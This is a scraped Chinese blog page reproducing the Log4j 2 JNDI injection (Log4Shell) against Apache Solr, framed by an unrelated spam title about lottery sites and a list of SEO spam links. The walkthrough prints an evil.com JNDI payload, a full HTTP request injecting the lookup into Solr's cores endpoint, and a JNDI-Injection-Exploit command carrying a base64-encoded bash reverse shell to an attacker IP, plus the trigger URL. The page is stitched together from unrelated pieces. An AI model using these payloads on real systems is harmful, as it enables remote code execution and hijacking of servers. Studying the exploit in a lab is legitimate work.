当前位置: 首页 > news >正文

私人让做彩票网站吗数据分析师培训机构

私人让做彩票网站吗,数据分析师培训机构,怎么注册域名免费,深圳设计公司深圳市广告公司Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于${jndi:ldap://evil.com/example}的lookup用于进行JNDI注入,执行任意代码。…

Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于`${jndi:ldap://evil.com/example}`的lookup用于进行JNDI注入,执行任意代码。

1.服务启动后,访问`http://your-ip:8983`即可查看到Apache Solr的后台页面。

2.`${jndi:dns://${sys:java.version}.example.com}`是利用JNDI发送DNS请求的Payload,我们将其作为管理员接口的action参数值发送如下数据包:

GET /solr/admin/cores?action=${jndi:ldap://${sys:java.version}.example.com} HTTP/1.1
Host: your-ip:8983
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Connection: close

3.我们可以在DNS日志平台收到相关日志,显示出当前Java版本:

4.利用工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all获得shell,

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjY0LjQzLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "192.168.64.43"

访问下面链接,成功反弹

http://192.168.188.128:8983/solr/admin/cores?action=${jndi:ldap://192.168.64.43:1389/08zqfe}

参考:hrrps://blog.csdn.net/Bossfrank/article/details/130148819

http://www.tj-hxxt.cn/news/100112.html

相关文章:

  • 全市政府网站建设常态化新浪微博指数查询
  • wordpress 企业 自适应安徽网络推广和优化
  • 免费下载一个app昆明seo工资
  • 个人网站建设方案书范文百度竞价排名模式
  • 怀远网站建设哪家好门户网站有哪些
  • 做网站的新闻常见的网络推广方法有哪些
  • 广州安全教育平台账号登录入口百度seo课程
  • 中信建设有限责任公司财务总监seo新站如何快速排名
  • 做网站四百全包nba新闻最新消息
  • 免费网络电话呼叫系统合肥优化营商环境
  • 分析网站建设的论文舟山seo
  • 环保网站建设公司排名网站建设哪家好
  • 徐家汇做网站2024年阳性什么症状
  • 湛江最新消息郑州seo排名优化公司
  • 猪八戒网可以做福彩网站吗腾讯广告投放推广平台
  • 外贸公司网站推广合肥网站seo推广
  • 美发网站怎么做百度普通下载
  • 程序开发合同福州seo排名优化
  • 网页生成pdf失败企业网站seo方案案例
  • 网站建设规划书万能竞价培训班
  • 怎么样销售关于网站建设百度快速排名优化技术
  • 自己有域名服务器怎样建设网站常熟网络推广
  • 如何做网站seo韩小培网店推广方案策划书
  • 谁家网站用户体验做的好百度近日收录查询
  • 长沙做网站那家好淘宝搜索热词排名
  • 开发做游戏的网站宁波seo深度优化平台
  • 做搬家网站的素材学生个人网页设计模板
  • 自己做一个音乐网站怎么做深圳网络推广公司哪家好
  • 网站开发工具选择百度开户代理商
  • 成都 企业网站建设营销型公司网站建设